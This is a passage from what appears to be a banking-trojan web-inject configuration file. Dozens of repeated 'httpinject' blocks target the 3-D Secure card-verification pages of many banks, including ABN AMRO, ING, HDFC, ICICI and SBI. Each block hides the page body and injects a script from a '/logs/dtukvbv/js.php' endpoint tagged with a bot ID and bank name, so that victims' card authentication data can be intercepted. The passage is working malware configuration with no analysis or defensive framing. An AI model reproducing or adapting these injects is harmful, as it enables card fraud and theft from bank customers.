610. </conditions>
611. <actions>
612. <modify>
613. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
614. <replacement><![CDATA[\1<style type="text/css">
615. body {visibility: hidden; }
616. </style>
617. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
618. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=mlp"></script>]]></replacement>
619. </modify>
620. </actions>
621. </httpinject>
622. <httpinject>
623. <conditions>
624. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://securecode\.abnamro\.nl/acspage/cap\?RID\=.*]]></url>
625. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
626. </url>
627. </conditions>
628. <actions>
629. <modify>
630. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
631. <replacement><![CDATA[\1<style type="text/css">
632. body {visibility: hidden; }
633. </style>
634. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
635. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=abnamro"></script>]]></replacement>
636. </modify>
637. </actions>
638. </httpinject>
639. <httpinject>
640. <conditions>
641. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.netcetera\.ch/acspage/cap\?RID\=.*]]></url>
642. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
643. </url>
644. </conditions>
645. <actions>
646. <modify>
647. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
648. <replacement><![CDATA[\1<style type="text/css">
649. body {visibility: hidden; }
650. </style>
651. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
652. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=netcetera"></script>]]></replacement>
653. </modify>
654. </actions>
655. </httpinject>
656. <httpinject>
657. <conditions>
658. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://securecode\.ing\.nl/acspage/cap\?RID\=.*]]></url>
659. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
660. </url>
661. </conditions>
662. <actions>
663. <modify>
664. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
665. <replacement><![CDATA[\1<style type="text/css">
666. body {visibility: hidden; }
667. </style>
668. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
669. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ing"></script>]]></replacement>
670. </modify>
671. </actions>
672. </httpinject>
673. <httpinject>
674. <conditions>
675. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://netsafe\.hdfcbank\.com/ACSWeb/jsp/.*]]></url>
676. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
677. </url>
678. </conditions>
679. <actions>
680. <modify>
681. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
682. <replacement><![CDATA[\1<style type="text/css">
683. body {visibility: hidden; }
684. </style>
685. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
686. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=hdfcbank"></script>]]></replacement>
687. </modify>
688. </actions>
689. </httpinject>
690. <httpinject>
691. <conditions>
692. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure\.axisbank\.com/ACSWeb/EnrollWeb/AxisBank/server/AccessControlServer.*]]></url>
693. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
694. </url>
695. </conditions>
696. <actions>
697. <modify>
698. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
699. <replacement><![CDATA[\1<style type="text/css">
700. body {visibility: hidden; }
701. </style>
702. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
703. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=axisbank"></script>]]></replacement>
704. </modify>
705. </actions>
706. </httpinject>
707. <httpinject>
708. <conditions>
709. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.3dsecure\.icicibank\.com/ACSWeb/EnrollWeb/ICICIBank/server/AccessControlServer.*]]></url>
710. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
711. </url>
712. </conditions>
713. <actions>
714. <modify>
715. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
716. <replacement><![CDATA[\1<style type="text/css">
717. body {visibility: hidden; }
718. </style>
719. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
720. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=icicibank.3dsecure"></script>]]></replacement>
721. </modify>
722. </actions>
723. </httpinject>
724. <httpinject>
725. <conditions>
726. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secureonline\.idbibank\.com/ACSWeb/EnrollWeb/IDBIBank/server/AccessControlServer.*]]></url>
727. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
728. </url>
729. </conditions>
730. <actions>
731. <modify>
732. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
733. <replacement><![CDATA[\1<style type="text/css">
734. body {visibility: hidden; }
735. </style>
736. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
737. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=idbibank"></script>]]></replacement>
738. </modify>
739. </actions>
740. </httpinject>
741. <httpinject>
742. <conditions>
743. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secureonline\.idbibank\.com/ACSWeb/EnrollWeb/IDBIBank/auth/VBV\.jsp.*]]></url>
744. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
745. </url>
746. </conditions>
747. <actions>
748. <modify>
749. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
750. <replacement><![CDATA[\1<style type="text/css">
751. body {visibility: hidden; }
752. </style>
753. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
754. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=idbibank"></script>]]></replacement>
755. </modify>
756. </actions>
757. </httpinject>
758. <httpinject>
759. <conditions>
760. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secureonline\.idbibank\.com/ACSWeb/EnrollWeb/IDBIBank/auth/SCode\.jsp.*]]></url>
761. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
762. </url>
763. </conditions>
764. <actions>
765. <modify>
766. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
767. <replacement><![CDATA[\1<style type="text/css">
768. body {visibility: hidden; }
769. </style>
770. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
771. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=idbibank.scode"></script>]]></replacement>
772. </modify>
773. </actions>
774. </httpinject>
775. <httpinject>
776. <conditions>
777. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.acb\.com\.vn/ACB/jsp/.*]]></url>
778. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
779. </url>
780. </conditions>
781. <actions>
782. <modify>
783. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
784. <replacement><![CDATA[\1<style type="text/css">
785. body {visibility: hidden; }
786. </style>
787. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
788. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=acb.vn"></script>]]></replacement>
789. </modify>
790. </actions>
791. </httpinject>
792. <httpinject>
793. <conditions>
794. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cards\.indusind\.com/IndusindBank/jsp/.*]]></url>
795. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
796. </url>
797. </conditions>
798. <actions>
799. <modify>
800. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
801. <replacement><![CDATA[\1<style type="text/css">
802. body {visibility: hidden; }
803. </style>
804. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
805. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=indusind"></script>]]></replacement>
806. </modify>
807. </actions>
808. </httpinject>
809. <httpinject>
810. <conditions>
811. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://corpbank\.electracard\.com/corpbank/jsp/.*]]></url>
812. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
813. </url>
814. </conditions>
815. <actions>
816. <modify>
817. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
818. <replacement><![CDATA[\1<style type="text/css">
819. body {visibility: hidden; }
820. </style>
821. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
822. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard"></script>]]></replacement>
823. </modify>
824. </actions>
825. </httpinject>
826. <httpinject>
827. <conditions>
828. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securepay\.hsbc\.co\.in/SecurePay/servlet/Authenticate.*]]></url>
829. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
830. </url>
831. </conditions>
832. <actions>
833. <modify>
834. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
835. <replacement><![CDATA[\1<style type="text/css">
836. body {visibility: hidden; }
837. </style>
838. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
839. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=hsbc.co.in"></script>]]></replacement>
840. </modify>
841. </actions>
842. </httpinject>
843. <httpinject>
844. <conditions>
845. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.onlinesbi\.com/sbi/jsp/.*]]></url>
846. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
847. </url>
848. </conditions>
849. <actions>
850. <modify>
851. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
852. <replacement><![CDATA[\1<style type="text/css">
853. body {visibility: hidden; }
854. </style>
855. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
856. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=onlinesbi"></script>]]></replacement>
857. </modify>
858. </actions>
859. </httpinject>
860. <httpinject>
861. <conditions>
862. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/CanaraBank/server/AccessControlServer.*]]></url>
863. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
864. </url>
865. </conditions>
866. <actions>
867. <modify>
868. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
869. <replacement><![CDATA[\1<style type="text/css">
870. body {visibility: hidden; }
871. </style>
872. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
873. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage"></script>]]></replacement>
874. </modify>
875. </actions>
876. </httpinject>
877. <httpinject>
878. <conditions>
879. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://pnb\.electracard\.com/pnb/jsp/.*]]></url>
880. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
881. </url>
882. </conditions>
883. <actions>
884. <modify>
885. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
886. <replacement><![CDATA[\1<style type="text/css">
887. body {visibility: hidden; }
888. </style>
889. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
890. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.pnb"></script>]]></replacement>
891. </modify>
892. </actions>
893. </httpinject>
894. <httpinject>
895. <conditions>
896. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/IndianBank/server/AccessControlServer.*]]></url>
897. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
898. </url>
899. </conditions>
900. <actions>
901. <modify>
902. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
903. <replacement><![CDATA[\1<style type="text/css">
904. body {visibility: hidden; }
905. </style>
906. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
907. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.indianbank"></script>]]></replacement>
908. </modify>
909. </actions>
910. </httpinject>
911. <httpinject>
912. <conditions>
913. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sparda\.wlp-acs\.com/flowGlobal\.wflow.*]]></url>
914. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
915. </url>
916. </conditions>
917. <actions>
918. <modify>
919. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
920. <replacement><![CDATA[\1<style type="text/css">
921. body {visibility: hidden; }
922. </style>
923. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
924. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=sparda"></script>]]></replacement>
925. </modify>
926. </actions>
927. </httpinject>
928. <httpinject>
929. <conditions>
930. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs3\.3dsecure\.no/mdpayacs/pareq.*]]></url>
931. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
932. </url>
933. </conditions>
934. <actions>
935. <modify>
936. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
937. <replacement><![CDATA[\1<style type="text/css">
938. body {visibility: hidden; }
939. </style>
940. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
941. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=3dsecure.no"></script>]]></replacement>
942. </modify>
943. </actions>
944. </httpinject>
945. <httpinject>
946. <conditions>
947. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://bankaljazira\.cardinalcommerce\.com/transaction/.*]]></url>
948. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
949. </url>
950. </conditions>
951. <actions>
952. <modify>
953. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
954. <replacement><![CDATA[\1<style type="text/css">
955. body {visibility: hidden; }
956. </style>
957. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
958. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.bankaljazira"></script>]]></replacement>
959. </modify>
960. </actions>
961. </httpinject>
962. <httpinject>
963. <conditions>
964. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/KotakBank/server/AccessControlServer.*]]></url>
965. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
966. </url>
967. </conditions>
968. <actions>
969. <modify>
970. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
971. <replacement><![CDATA[\1<style type="text/css">
972. body {visibility: hidden; }
973. </style>
974. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
975. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.kotakbank"></script>]]></replacement>
976. </modify>
977. </actions>
978. </httpinject>
979. <httpinject>
980. <conditions>
981. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cosacs\.electrapay\.com/CosmosBank/jsp/.*]]></url>
982. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
983. </url>
984. </conditions>
985. <actions>
986. <modify>
987. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
988. <replacement><![CDATA[\1<style type="text/css">
989. body {visibility: hidden; }
990. </style>
991. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
992. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electrapay"></script>]]></replacement>
993. </modify>
994. </actions>
995. </httpinject>
996. <httpinject>
997. <conditions>
998. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.ing\.ro/acs/auth/.*]]></url>
999. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1000. </url>
1001. </conditions>
1002. <actions>
1003. <modify>
1004. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1005. <replacement><![CDATA[\1<style type="text/css">
1006. body {visibility: hidden; }
1007. </style>
1008. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1009. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ing.ro"></script>]]></replacement>
1010. </modify>
1011. </actions>
1012. </httpinject>
1013. <httpinject>
1014. <conditions>
1015. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/BOB/server/AccessControlServer.*]]></url>
1016. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1017. </url>
1018. </conditions>
1019. <actions>
1020. <modify>
1021. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1022. <replacement><![CDATA[\1<style type="text/css">
1023. body {visibility: hidden; }
1024. </style>
1025. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1026. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.bob"></script>]]></replacement>
1027. </modify>
1028. </actions>
1029. </httpinject>
1030. <httpinject>
1031. <conditions>
1032. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/BOBCards/server/AccessControlServer.*]]></url>
1033. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1034. </url>
1035. </conditions>
1036. <actions>
1037. <modify>
1038. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1039. <replacement><![CDATA[\1<style type="text/css">
1040. body {visibility: hidden; }
1041. </style>
1042. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1043. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.bobcards"></script>]]></replacement>
1044. </modify>
1045. </actions>
1046. </httpinject>
1047. <httpinject>
1048. <conditions>
1049. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/DenaBank/server/AccessControlServer.*]]></url>
1050. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1051. </url>
1052. </conditions>
1053. <actions>
1054. <modify>
1055. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1056. <replacement><![CDATA[\1<style type="text/css">
1057. body {visibility: hidden; }
1058. </style>
1059. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1060. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.denabank"></script>]]></replacement>
1061. </modify>
1062. </actions>
1063. </httpinject>
1064. <httpinject>
1065. <conditions>
1066. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/KVB/server/AccessControlServer.*]]></url>
1067. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1068. </url>
1069. </conditions>
1070. <actions>
1071. <modify>
1072. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1073. <replacement><![CDATA[\1<style type="text/css">
1074. body {visibility: hidden; }
1075. </style>
1076. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1077. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.kvb"></script>]]></replacement>
1078. </modify>
1079. </actions>
1080. </httpinject>
1081. <httpinject>
1082. <conditions>
1083. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/FederalBank/server/AccessControlServer.*]]></url>
1084. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1085. </url>
1086. </conditions>
1087. <actions>
1088. <modify>
1089. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1090. <replacement><![CDATA[\1<style type="text/css">
1091. body {visibility: hidden; }
1092. </style>
1093. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1094. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.federalbank"></script>]]></replacement>
1095. </modify>
1096. </actions>
1097. </httpinject>
1098. <httpinject>
1099. <conditions>
1100. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/UCOBank/server/AccessControlServer.*]]></url>
1101. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1102. </url>
1103. </conditions>
1104. <actions>
1105. <modify>
1106. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1107. <replacement><![CDATA[\1<style type="text/css">
1108. body {visibility: hidden; }
1109. </style>
1110. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1111. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.ucobank"></script>]]></replacement>
1112. </modify>
1113. </actions>
1114. </httpinject>
1115. <httpinject>
1116. <conditions>
1117. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/IOB/server/AccessControlServer.*]]></url>
1118. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1119. </url>
1120. </conditions>
1121. <actions>
1122. <modify>
1123. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1124. <replacement><![CDATA[\1<style type="text/css">
1125. body {visibility: hidden; }
1126. </style>
1127. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1128. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.iob"></script>]]></replacement>
1129. </modify>
1130. </actions>
1131. </httpinject>
1132. <httpinject>
1133. <conditions>
1134. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/CorporationBank/server/AccessControlServer.*]]></url>
1135. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1136. </url>
1137. </conditions>
1138. <actions>
1139. <modify>
1140. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1141. <replacement><![CDATA[\1<style type="text/css">
1142. body {visibility: hidden; }
1143. </style>
1144. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1145. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.corporationbank"></script>]]></replacement>
1146. </modify>
1147. </actions>
1148. </httpinject>
1149. <httpinject>
1150. <conditions>
1151. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/JKBank/server/AccessControlServer.*]]></url>
1152. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1153. </url>
1154. </conditions>
1155. <actions>
1156. <modify>
1157. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1158. <replacement><![CDATA[\1<style type="text/css">
1159. body {visibility: hidden; }
1160. </style>
1161. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1162. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.jkbank"></script>]]></replacement>
1163. </modify>
1164. </actions>
1165. </httpinject>
1166. <httpinject>
1167. <conditions>
1168. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/ComBank/server/AccessControlServer.*]]></url>
1169. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1170. </url>
1171. </conditions>
1172. <actions>
1173. <modify>
1174. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1175. <replacement><![CDATA[\1<style type="text/css">
1176. body {visibility: hidden; }
1177. </style>
1178. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1179. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.combank"></script>]]></replacement>
1180. </modify>
1181. </actions>
1182. </httpinject>
1183. <httpinject>
1184. <conditions>
1185. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/SeylanBank/server/AccessControlServer.*]]></url>
1186. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1187. </url>
1188. </conditions>
1189. <actions>
1190. <modify>
1191. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1192. <replacement><![CDATA[\1<style type="text/css">
1193. body {visibility: hidden; }
1194. </style>
1195. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1196. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.seylanbank"></script>]]></replacement>
1197. </modify>
1198. </actions>
1199. </httpinject>
1200. <httpinject>
1201. <conditions>
1202. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/AndhraBank/server/AccessControlServer.*]]></url>
1203. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1204. </url>
1205. </conditions>
1206. <actions>
1207. <modify>
1208. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1209. <replacement><![CDATA[\1<style type="text/css">
1210. body {visibility: hidden; }
1211. </style>
1212. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1213. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage.andhrabank"></script>]]></replacement>
1214. </modify>
1215. </actions>
1216. </httpinject>
1217. <httpinject>
